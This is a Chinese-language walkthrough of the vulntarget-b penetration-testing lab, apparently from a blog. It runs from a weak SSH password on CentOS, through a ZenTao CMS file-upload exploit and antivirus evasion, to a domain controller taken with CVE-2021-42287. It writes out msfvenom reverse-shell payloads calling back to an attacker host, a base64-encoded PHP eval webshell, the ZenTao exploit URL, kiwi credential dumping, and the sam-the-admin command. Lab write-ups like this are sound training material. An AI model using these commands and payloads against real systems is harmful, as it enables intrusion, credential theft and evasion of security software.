vulntarget-b

实际部署之后centos7 的ip有所变动分别是 :192.168.127.130以及10.0.20.30

Centos7

老规矩还是先用fscan扫一下服务和端口，找漏洞打

直接爆出来一个SSH弱口令…，上来就不用打了，什么意思？？？
直接xshell登入，生成一个MSF木马，然后上线。

上线MSF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.127.129 LPORT=8888 -f elf > mshell.elf

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.127.129
set lport 8888
run

添加路由

run post/multi/manage/autoroute

看到另外一个网段

[!]  * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.127.0/255.255.255.0 from host's routing table.

上传Fscan

直接使用msf的命令即可上传

upload /root/home/tools/fscan /tmp/

然后执行shell命令，获取centos的shell，（你可能会说，都有密码了，直接连接不行吗？害，应急做多了，老是会想到，ssh有记录。)

/usr/bin/script -qc /bin/bash /dev/null   #获得交互式shell

然后执行，执行扫描的时候需要加上-np，因为win10的那一台机器开着防火墙，ping不通

cd /tmp
chmod +x fscan
./fscan -h 10.0.20.1/24  -np   

执行结果，我把不相关的直接删除了，看重点即可。

[root@localhost tmp]# ./fscan -h 10.0.20.1/24 -np___                              _    / _ \     ___  ___ _ __ __ _  ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   fscan version: 1.8.3
start infoscan
10.0.20.66:3306 open
10.0.20.66:8080 open
[*] 扫描结束,耗时: 4m20.058335309s

发现内网有一个10.0.20.66并且开放了3306和8080端口，先看一下8080端口

WIN10

端口转发

将本地kali的8181端口转发给内网机器10.0.20.66的8080端口

portfwd add -l 8282 -p 8080 -r 10.0.20.66

这个时候直接访问kali的8282端口就能访问到10.0.20.66的8181端口了，主要是将centos给当跳板了。
访问了一下，发现是禅道CMS

账号和密码是弱口令: admin/Admin#123，看其他博主爆出来的，在后台可以看到版本信息，

这个版本存在一个漏洞：禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325，具体漏洞详情不多介绍，网上有很多例子。

禅道CMS

在centos中创建一个php🐎

echo PD9waHAgQGV2YWwoJF9QT1NUWydiJ10pOz8+ | base64 -d >> shell.php

然后用python开启一个http服务，centos内置python为python2版本，使用下面命令开启，确保shell.php在执行命令的目录内

python -m SimpleHTTPServer 7777

构造参数

HTTP://10.0.20.30:7777/shell.php
base64加密一下
SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA=

最终的payload是

http://192.168.127.129:8282/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA=

请求一下这个url，禅道会向刚刚开启的那个HTTP服务请求shell.php并且会保存到data\client\1目录中，所以🐎的地址为：http://192.168.127.129:8282/data/client/1/shell.php
连接成功，木马上线

MSF上线

生成一个反弹shell马，因为正向马过不去，关防火墙也没权限

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=7656 -f exe >7656.exe

使用蚁剑上传，神奇的一幕出现了，上传上去立马就没了，排查一下进程

tasklist 

复制到进程识别工具中：https://tasklist.pdsec.top/

发现了火绒程序

免杀

这里直接使用掩日的免杀工具

这个使用起来特别简单，直接选择好MSF生成的🐎，然后点击生成就会生成一个绕过杀毒软件的木马
MSF启动监听，注意这个IP，不要再设置为kali的IP了

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp   
set lhost 10.0.20.30
set lport 7656
run

然后在蚁剑的终端中运行那个木马程序，上线（￣︶￣）↗　

再进行一个进程迁移

run post/windows/manage/migrate 

添加路由

run post/multi/manage/autoroute

发现一个10.0.10.0/255.255.255.0的网段

扫描内网

使用arp扫描一下10.0.10.0/255.255.255.0这个网段的主机

use post/windows/gather/arp_scanner
set rhosts 10.0.10.1-254
set session 3
run

在这一步发生了一件比较离谱的事情，每次扫描的时候，session都会掉

把火绒关了也是如此，所以我在想是不是有什么bug，于是我换了一种思路，直接上传一个fsca，然后用fscan扫，上传之前，我把火绒开启了，奇怪的是，火绒竟然没有杀掉，可能是规则库太老了。
老规矩还是加上-np参数

fscan.exe -h 10.0.10.1/24 -np

扫描结果

10.0.10.100:135 open
10.0.10.100:139 open
10.0.10.100:445 open

发现了一个10.0.10.100的主机，10.0.10.99是当前主机的IP，先进行一下主机信息收集吧

主机信息收集

通过ipconfig /all可以看到主DNS后缀，基本上可以判定当前主机为域用户

定位域控
直接使用nslookup解析域名，获得域控的IP，ip为10.0.10.100

抓取Hash

抓取Hash之前需要先提权一下，要不然抓不了

提权

直接使用MSF自带的功能即可

getsystem

抓取hash

load kiwi 
creds_all

没有抓取到明文hash

去cmd5里面解析一下NTLM
解密如下

win101 admin#123

域控

CVE-2021-42287

由于Active Directory没有对域中计算机与服务器账号进行验证，经过身份验证的攻击者利用该漏洞绕过完全限制，可将域中普通用户权限提升为域管理员权限并执行任意代码
我们在win10中已经拿到了域成员的账号和密码:win101/admin#123
POC： https://github.com/WazeHell/sam-the-admin.git

搭建代理

运行这个POC之前需要先搭建一个代理，要不然访问不到

use auxiliary/server/socks_proxy
run

然后进行漏洞利用

proxychains python3 sam_the_admin.py vulntarget.com/win101:'admin#123' -dc-ip 10.0.10.100 -shell

成功拿到域控的shell

思路

Centos没啥好说的，弱口令打的，Win10是禅道CMS打进去的，然后MSF上线，免杀用的是掩日的工具，添加路由，用CVE-2021-42287打的域控，脚本一把梭，妥妥的脚本小子一个了。